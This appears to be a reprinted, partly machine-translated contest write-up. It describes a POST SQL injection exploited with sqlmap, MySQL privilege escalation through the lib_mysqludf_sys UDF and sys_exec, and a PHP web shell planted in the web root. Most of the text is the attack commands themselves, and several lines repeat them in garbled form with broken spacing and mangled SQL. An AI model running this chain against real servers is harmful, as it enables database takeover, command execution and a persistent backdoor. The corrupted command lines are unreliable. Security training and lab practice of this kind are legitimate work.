A few days ago, there was a question in a small contest: a post injection vulnerability was found in the login page of a given test environment, so I decisively operated the sqlmap to run the data, and found that the current MySQL connection user was root, so I thought of UDF to raise the right. "Although MySQL under Windows basically has no question, it has never been successful under Linux. "The main problem is that MySQL runs with root permission." take notes as follows for future reference:
The specific steps are as follows
- Find the MySQL plug-in Directory: Python sqlmap.py - U 'http: / / XXXX' -- SQL shellshow variables like "% plugin%";
python sqlmap.py -u 'http://xxxx' --sql-shell
show variables like "%plugin%";
- Use sqlmap to upload lib ﹣ mysqludf ﹣ sys to MySQL plug-in directory; Python sqlmap. Py - U 'http: / / XXXX' -- file write = / lib ﹣ mysqludf ﹣ sys. So -- File dest = / usr / lib / MySQL / plugin/
python sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so
--file-dest=/usr/lib/mysql/plugin/
- Activate the stored procedure "sys exec" function: Python sqlmap.py - U 'http: / / XXXX' -- SQL shellcreate function sys exec returns string soname lib "mysqludf" sys. Soselect * from information "schema. Routinesss" exec (ID);
python sqlmap.py -u 'http://xxxx' --sql-shell
CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so
SELECT * FROM information_schema.routines
sys_exec(id);
- Also use sqlmap to upload the backdoor program: Python sqlmap. Py - U 'http: / / xxx' -- file write = C: / PHP spy. PHP -- File dest = / var / www / spy. PHP
python sqlmap.py -u 'http://xxx' --file-write=C:/phpspy.php --file-dest=/var/www/spy.php
testing environment
- Linux Ubuntu 11.04 (Natty Narwhal)
- PHP 5.3.5, Apache 2.2.17
- MySQL 5
Reference material
- http://forelsec.blogspot.com/2012/08/solving-pwn0s-v2.html
- https://github.com/mysqludf/lib_mysqludf_sys
- https://code.google.com/p/mysql-udf-http/
[via @ network] Note: This article is reprinted from the network, and the source is not signed by the author. If the author sees this article, please leave a message and we will supplement it in time.
Update today + 1
- Hackertools
Hackertools